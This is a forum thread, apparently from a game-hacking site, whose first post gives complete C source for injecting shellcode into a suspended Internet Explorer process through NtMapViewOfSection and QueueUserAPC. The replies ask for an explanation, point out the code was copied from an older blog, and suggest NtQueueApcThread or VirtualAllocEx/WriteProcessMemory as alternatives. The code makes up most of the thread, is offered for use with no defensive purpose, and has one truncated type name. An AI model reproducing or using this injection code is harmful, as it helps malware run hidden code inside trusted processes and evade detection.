Results 1 to 3 of 3
  1. #1
    The_USDL
    The_USDL is offline
    Senior Member The_USDL's Avatar
    Join Date
    2011 Oct
    Posts
    201
    Thanks
    24
    Thanked 538 Times in 47 Posts
    Rep Power
    0

    Code Injection - QueueUserAPC

    Code:
     #define _WIN32_WINNT 0x0400
            #include <windows.h>
     
     //Press Thanks to USDL :)
    //Press Thanks to USDL :)
    //Press Thanks to USDL :)
    
            typedef LONG NTSTATUS, *PNTSTATUS;
            #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
     
            typedef enum _SECTION_INHERIT
            {
            ViewShare = 1,
            ViewUnmap = 2
            } SECTION_INHERIT;
     
     
     
            typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE,
            HANDLE,
            LPVOID,
            ULONG,
            SIZE_T,
            LARGE_INTEGER*,
            SIZE_T*,
            _INHERIT,
            ULONG,
            ULONG );
     
            func_NtMapViewOfSection NtMapViewOfSection = NULL;
     
     
     
     
     
     
     
     
     
     
            LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess,
            HANDLE hFileMappingObject,
            DWORD dwDesiredAccess,
            DWORD dwFileOffsetHigh,
            DWORD dwFileOffsetLow,
            DWORD dwNumberOfBytesToMap,
            LPVOID lpBaseAddress )
            {
            NTSTATUS Status;
            LARGE_INTEGER SectionOffset;
            ULONG ViewSize;
            ULONG Protect;
            LPVOID ViewBase;
     
     
            // Convert the offset
            SectionOffset.LowPart = dwFileOffsetLow;
            SectionOffset.HighPart = dwFileOffsetHigh;
     
            // Save the size and base
            ViewBase = lpBaseAddress;
            ViewSize = dwNumberOfBytesToMap;
     
            // Convert flags to NT Protection Attributes
            if (dwDesiredAccess & FILE_MAP_WRITE)
            {
            Protect = PAGE_READWRITE;
            }
            else if (dwDesiredAccess & FILE_MAP_READ)
            {
            Protect = PAGE_READONLY;
            }
            else if (dwDesiredAccess & FILE_MAP_COPY)
            {
            Protect = PAGE_WRITECOPY;
            }
            else
            {
            Protect = PAGE_NOACCESS;
            }
     
            // Map the section
            Status = NtMapViewOfSection(hFileMappingObject,
            hProcess,
            &ViewBase,
            0,
            0,
            &SectionOffset,
            &ViewSize,
            ViewShare,
            0,
            Protect);
            if (!NT_SUCCESS(Status))
            {
            // We failed
            return NULL;
            }
     
            // Return the base
            return ViewBase;
            }
     
     
     
     
            int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
            {
            HMODULE hDll = LoadLibrary( "ntdll.dll" );
            NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");
            // Getting a shellcode, use whatever you want
            HANDLE hFile = CreateFile ("C:\\shellcode.txt",
            GENERIC_READ,
            0,
            NULL,
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            NULL);
            HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);
            // Starting target process
            STARTUPINFO st;
            ZeroMemory (&st, sizeof(st));
            st.cb = sizeof (STARTUPINFO);
            PROCESS_INFORMATION pi;
            ZeroMemory (&pi, sizeof(pi));
            CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe",
            NULL,
            NULL,
            NULL,
            FALSE,
            CREATE_SUSPENDED,
            NULL,
            NULL,
            &st,
            &pi);
            // Injecting the shellcode into target process address space
            LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess,
            hMappedFile,
            FILE_MAP_READ,
            0,
            0,
            0,
            NULL);
            // Create a new APC which will be executed at first when the thread resume
            QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
            ResumeThread (pi.hThread);
            CloseHandle (hFile);
            CloseHandle (hMappedFile);
            CloseHandle (pi.hThread);
            CloseHandle (pi.hProcess);
            return 0;
            }

    PRESS THANKS
    Last edited by The_USDL; 2012-02-08 at 07:07 PM.

  2. #2
    DatSik
    DatSik is offline
    New member DatSik's Avatar
    Join Date
    2012 Sep
    Location
    Oklahoma
    Posts
    24
    Thanks
    1
    Thanked 9 Times in 1 Post
    Rep Power
    0
    I appreciate this, could you explain a bit more? if you have time that is, its not big deal but I would like to hear what you have to say

  3. #3
    Sirmabus
    Sirmabus is offline
    New member
    Join Date
    2010 Jul
    Posts
    20
    Thanks
    2
    Thanked 10 Times in 4 Posts
    Rep Power
    0

    Copy and paste? Also use the ntdll.dll version

    Did you copy and paste this or from some other blog from 2007?
    远程代码注入新技术 - hackycz的日志 - 网易博客
    It's the same exact code.

    It's interesting to map a shared memory and do it this way. The more traditional way is to use VirtualAllocEx() to allocate memory in the remote process, then WriteProcessMemory() to write to it.
    You usually only need to write mostly, the advantage I see in using shared is you could read from it directly, plus if you needed to repeated access it's faster then doing the xxxxxProcessMemory() functions.

    Also it would be better to use the the internal ntdll.dll layer version "NtQueueApcThread()" instead as QueueUserAPC() has some relevant process context stuff that might either cause it to fail or crash your target.

Similar Threads

  1. [C++] Dll injection - QueueUserAPC
    By The_USDL in forum Programming Tutorials
    Replies: 0
    Last Post: 2012-02-08, 06:00 PM
  2. [AutoIt] ASM injection into process
    By pohkak in forum AutoIt
    Replies: 2
    Last Post: 2011-07-30, 10:51 AM
  3. [Dev] DLL Injection Possible
    By Abstract in forum Forsaken World Bots, Hacks, Cheats
    Replies: 0
    Last Post: 2011-05-08, 12:16 AM
  4. [C++] Code Cave DLL Injection
    By Dwar in forum C/C++
    Replies: 1
    Last Post: 2010-11-29, 04:10 PM
  5. Code-Injection with Cheat Engine
    By Dwar in forum Game Researching Tutorials
    Replies: 0
    Last Post: 2010-11-14, 11:58 AM
Visitors found this page by searching for:

QueueUserAPC injection

QueueUserAPC inject

queueuserapc

queueuserapc example

inject queueuserapcqueueuserapc c code injection c queueuserapc code injectionshellcode injection c QueueUserAPC c#queueuserapc injection exampleapc dll injectionqueueuserapc dll injectionc queueuserapcntmapviewofsection injectionqueueuserapc inject dllQueueUserAPC inject dll LdrInitializeThunkinjecting with queuuserapcntmapviewofsection examplequeueuserapc [delayed injection]inject using queueuserapc c inject shellcode C c inject shellcodedll injection queueuserapcntmapViewOfSection

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •